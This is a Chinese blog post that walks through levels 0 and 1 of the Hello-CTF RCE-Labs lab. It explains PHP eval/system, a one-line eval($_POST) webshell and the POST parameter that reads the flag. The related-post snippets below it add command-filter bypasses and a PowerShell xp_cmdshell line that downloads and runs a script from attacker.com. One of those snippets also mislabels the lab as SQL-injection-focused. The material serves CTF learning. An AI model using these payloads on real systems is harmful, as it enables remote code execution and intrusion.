[Hello-CTF]RCE-Labs超详细WP-Level 0&1

已于 2025-03-16 15:04:30 修改
阅读量768 收藏 14
点赞数 13
CC 4.0 BY-SA版权
分类专栏: 网络空间安全复现&题解 [Hello-CTF]RCE-labs WriteUp 文章标签: 网络安全 web安全
于 2025-03-08 15:32:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_39673370/article/details/146117160

Level 0

  • 这关 Flag 怎么获取就不多说了, 开头显示的两个就是
  • 接下来对靶场的源码解释一下
    • 前面输出的两句包含 Flag 的先跳过, 后面再说怎么来的
  • <?php 后开始看
    • 首先是 探姬 写的注释, 也是提示, 请务必自己仔细阅读(后面就不对此强调了)
      • 当于是一步步引导如何完成这些关卡
      • 理论上就应该看着些提示, 然后自己去学习相关内容, 就有能力完成题目~~(而不是来看别人写的WP)~~
    • 然后就定义了 $code, $bash 两个变量, 然后就通过 eval() 执行 $code 变量的内容, 然后通过 system 执行 $bash 的内容
    • 先来看 $codeeval() 这两个语句
      • $code 是一个字符串变量
        • 其中包含着两个语句
        • 一个是 include(flag.php);, 将 flag.php 的文件内容包含到本文件内容中, 并执行
          • 但是这里并不能看出 flag.php 内容是什么
          • 大概是定义了 $flag 这个变量
        • 另一个语句就是 echo 'This will get the flag by eval PHP code: '.\$flag;
          • 首先是 echo , 这个语法的作用是把后面的字符输出到前端页面
          • echo 后跟着是 'This will get the flag by eval PHP code: '.\$flag; 字符串
            • 把他们进行拆分一下
              • 'This will get the flag by eval PHP code: '
                • 这个是个常规的字符串
              • .
                • 这个是 PHP 中的字符串连接符, 将字符串与其他变量进行连接
                • 并自动进行转换
              • \$flag
                • 这里的 \$flag 变量进行转义, 使 $flag 变量在这里是 $flag
                • 而非这个变量的值
      • 接着 $code 变量会被传递给 eval() 执行

        • eval() 会执行如下两个指令

          include('flag.php');
echo 'This will get the flag by eval PHP code: '.$flag;
        • 这里注意的是, 虽然 $code 变量中 \$flag 被转义了, 成为了 $flag
          • 但是在 eval() 中, $flag 就是 $flag, 咩有被转义, 所以 echo 输出的是 $flag 的值
    • 接着来看 $bashsystem() 这两个语句
      • eval() 不同的是 system() 执行的是系统命令行的 Bash 指令, 而非 PHP 语句
      • 所以 $bash 变量中, 先用 echo 输出提示, 然后再使用 cat /flag 获取根目录下flag文件中的内容
        • 或许这里会有疑问
          • echo 不是 PHP 的语法吗, system 执行的不是 Bash 命令吗, 为什么这里可以用
            • 其实只是刚好同名罢了, echo 在 PHP 和 Bash 中都存在
    • 最后在通过 highlight_file(__FILE__);
      • 使 index.php 的代码高光显示, 并自然而然地衔接在上文输出之后
  • 或许看完这么多, 会对后续的 PHP 代码理解有所帮助吧

Leve 1

  • 这关的代码很简单, 每关都有的 include ("get_flag.php");highlight_file(__FILE__); 就不再介绍
  • 接下来就是 eval($_POST['a']);, 而这一代码就是典型的一句话木马
    • 即将 POST 请求的 a 的值传入给 eval() 执行
  • 解题步骤
    • 打开 BurpSuite 抓到靶场网页的请求
    • 对着报文 -> 右键 -> 修改请求方法(改为 POST 请求)

      • 然后再末尾添加参数(eval执行的命令就是参考第一关的)

        a=echo $flag;
    • 发送请求即可获得 flag
      -在这里插入图片描述
HelloCTF [RCE-labs] Level 0 - 代码执行&命令执行
weixin_73049307的博客
10-28 612
任意代码执行(Arbitrary Code Execution,ACE)」 是指攻击者在目标计算机或目标进程中运行攻击者选择的任何命令或代码的能力,这是一个广泛的概念,它涵盖了任何类型的代码运行过程,不仅包括系统层面的脚本或程序,也包括应用程序内部的函数或方法调用。这些命令最终的指向通常是系统命令,如Windows中的CMD命令或Linux中的Shell命令,这在语言中可以体现为一些特定的函数或者方法调用,如PHP中的shell_exec()函数或Python中的os.system()函数。
RCE以及Upload -lab的小心得
qq_42739469的博客
11-05 269
为了更好地使用代码的重用性,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码,简单点来说就是一个文件里面包含另外一个或多个文件。
PHP 代码执行相关函数
weixin_73049307的博客
10-28 455
过滤数组元素,如果提供回调函数,仅包含回调返回真值的元素;没有返回值,除非在执行的代码中明确返回。迭代一个数组,通过回调函数将数组的元素逐一减少到单一值。接受数组、回调函数和可选的初始值。用于调用回调函数,可以传递多个参数给回调函数,返回回调函数的返回值。对数组进行自定义排序,接受数组和比较函数作为参数。创建匿名函数,接受两个字符串参数:参数列表和函数体。返回一个匿名函数的引用。将回调函数应用于数组的每个元素,返回一个新数组。调用回调函数,并将参数作为数组传递。或其他动态执行代码的功能,用于间接执行代码。
rce-labs Level 2
最新发布
RanQ的博客
05-08 260
选中1部分:他说了发送?action=r ,就重置选中的函数,也就是说我每发一个包就会选择一个他list里面的一个函数,那么我们测试一下。选中2部分:他的大概意思就是,我们发送post请求,且请求url为?action=submin,他就会执行相当于一句话木马的操作,但是得选中eval函数,那么现在选中eval函数及为关键,流程:因为他上述代码是随机选择list里的函数,所以我们只需要一直发get请求的?action=r,重置函数到eval,再执行post请求操作。
[Hello-CTF]RCE-Labs超详细WP-Level 5
qq_39673370的博客
03-09 860
WAF绕过初试
[Hello-CTF]RCE-Labs超详细WP-Level13&Level14(PHP下的0/1构造RCE命令&简单的字数限制RCE)
qq_39673370的博客
03-13 953
PHP下的0/1构造RCE命令&简单的字数限制RCE
[Hello-CTF]RCE-Labs超详细WP-Level7&Level8
qq_39673370的博客
03-10 897
绕过空格与输出重定向
4.19学习——RCE-labs刷题
2401_88422349的博客
04-19 678
这里解释一下stdout和stderr,stdout是正常输出文件描述符1,比如我们执行的命令结果,stderr是报错输出文件描述符2,就是一些运行的错误信息,所以为什么加上2>&1就无法回显报错信息,因为将报错信息重定向到·正常输出中,然后又定向到空设备丢弃,就形成了无回显,这里可以使用;但是这里只过滤了flag,有非常多的方法,最简单的就是用/和\分隔就行了,也可以参考题目中提到的用*,[],{}去触发匹配。这题跟上面差不多,只是过滤了1,题目中提供了个脚本可以一把梭,这里的1可以用{##}进行绕过。
[Hello-CTF]RCE-Labs超详细WP-Level10(无字母命令执行_二进制整数替换)
qq_39673370的博客
03-12 1260
无字母命令执行_二进制整数替换
HelloCTF [RCE-labs] Level 8 - 文件描述和重定向
weixin_73049307的博客
10-29 862
使用base64命令将/flag的内容编码成Base64格式,然后通过管道输出。这行代码将执行命令 $cmd,并且将其标准输出和标准错误输出都重定向到 /dev/null,这意味着无论命令的输出还是可能产生的错误信息都不会显示出来。2>&1 是另一个重定向操作,它把标准错误输出复制到之前的标准输出位置(即 /dev/null),这样标准错误也不会出现在屏幕上。> /dev/null 是一个输出重定向,它把标准输出重定向到 /dev/null,这样就不会有输出出现在屏幕上。一样成功得到flag。
HelloCTF [RCE-labs] Level 6 - 通配符匹配绕过
weixin_73049307的博客
10-28 396
使用 /bin/base64 /flag。可以尝试在Linux终端中做下面的几个实验,使用echo方法输出?#使用 /bin/cat /flag。b-zA-Z 过滤b到Z范围内的任何单个字符。:{}\-\+<>\"| 匹配这些符号之一。(这里我重开了靶场,所以flag不一样)\[\] 匹配这些符号之一。也一样能拿到flag。
HelloCTF [RCE-labs] Level 3 - 命令执行
weixin_73049307的博客
10-28 295
这关代码跟level 1的区别是eval($_POST['a']);变成了system($_POST['a']);system() 函数会通过软连接执行你输入的系统命令。POST传参:a=cat /flag。
HelloCTF [RCE-labs] Level 7 - 空格过滤
weixin_73049307的博客
10-29 315
空格则选择< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS之一进行替代即可。(不知道为什么这题%20(space)、%09(tab)不可以替代空格)由level 5得知flag可以用fl$*ag进行替代。GET传参cmd,对flag字符串和空格进行了过滤。
CTFhub RCE靶场
qq_64703089的博客
08-06 667
通过管道符,可以将一个命令的标准输出管理为另外一个命令的标准输入,当它失败后,会执行另外一条命令。修改发送方法为post,目标修改为/?观察phpinfo得出需要用php://input。发现 flag_8051660913375.php。遂构造php://input发现行不通,所以用php://filter。发现有个php文件,cat一下。发现 flag_is_here。
pikachu
m0_74871683的博客
10-17 852
首先,随便选一个球星,观察到url是可见其中包含了一个文件file1.php,猜测这里其他文件名可能也是个filex.php(x是数字)的格式把5个NBA球星都选一遍,发现文件名确实是file1.php~file5.php用burp爆破,send to intruder爆破位置设置为文件名中的数字,payload设置为Numbers,从6到100,步长为1,点start attack开始爆破。
HelloCTF [RCE-labs] Level 1 - 一句话木马和代码执行
weixin_73049307的博客
10-28 589
一眼看到一句话木马的语句:eval($_POST['a']);而且指明了flag跟get_flag.php有关。说明flag在根目录下。
[Hello-CTF]RCE-labs靶场搭建简述
qq_39673370的博客
03-03 747
简述RCE-labs靶场搭建
HelloCTF [RCE-labs] Level 2 - PHP代码执行函数
weixin_73049307的博客
10-28 715
检查URL中是否有一个名为action的参数。如果有,就使用该参数的值作为start()函数的参数来执行相应的逻辑。如果没有,就执行一个空字符串并没有实际的效果,只是意味着不做任何事情。POST传参content=assert(print_r($flag))得到使用assert()函数。GET传参action。
[Hello-CTF]RCE-Labs超详细WP-Level 6
qq_39673370的博客
03-09 737
通配符的限制
[RCE-labs] Level 3
01-19
### RCE-Labs Level 3 概述 RCE-Labs 是一系列针对 SQL 注入漏洞利用的教学平台,旨在帮助安全研究人员理解和掌握如何通过SQL注入实现远程代码执行 (Remote Code Execution, RCE)[^1]。Level 3 特别关注于绕过某些防护机制并最终获得服务器控制权。 ### 技术细节与挑战 在这一级别中,目标应用程序启用了 `Ole Automation Procedures` 功能: ```sql EXEC sp_configure &#39;Ole Automation Procedures&#39;,1; RECONFIGURE; ``` 这允许攻击者创建 COM 对象来调用外部程序或脚本引擎,从而可能引发任意命令执行的风险。然而,在实际环境中此功能通常被禁用以增强安全性。 ### 利用方法分析 为了成功完成该级别的挑战,可以考虑以下技术路径之一: #### 方法一:使用 WScript.Shell 执行系统指令 当 `Ole Automation Procedures` 被启用时,可以通过如下方式实例化 Windows Script Host 的 Shell 对象,并运行 calc.exe 来验证是否能够触发计算器应用作为测试案例: ```sql DECLARE @o int; EXEC sp_OACreate &#39;WScript.Shell&#39;,@o OUT; EXEC sp_OAMethod @o,&#39;Run&#39;,NULL,&#39;calc.exe&#39;; ``` 这种方法展示了基本原理,但在真实场景下还需要进一步处理返回数据以及隐藏进程启动等问题。 #### 方法二:借助 PowerShell 提升权限 另一种更隐蔽且强大的手段是利用PowerShell来进行更为复杂的操作,比如下载恶意软件到本地磁盘然后加载执行等动作。不过需要注意的是这种方式可能会受到更多监控工具的关注而容易暴露行为特征。 ```sql DECLARE @cmd nvarchar(4000); SET @cmd=&#39;powershell -nop -w hidden -c &quot;IEX(New-Object Net.WebClient).DownloadString(&#39;&#39;http://attacker.com/malicious.ps1&#39;&#39;)&quot;&#39;; EXEC xp_cmdshell @cmd; ``` 上述两种途径均需谨慎对待,仅限合法授权下的渗透测试活动中采用;任何非法入侵他人计算机信息系统的行为都是违法的!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Haicaji

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值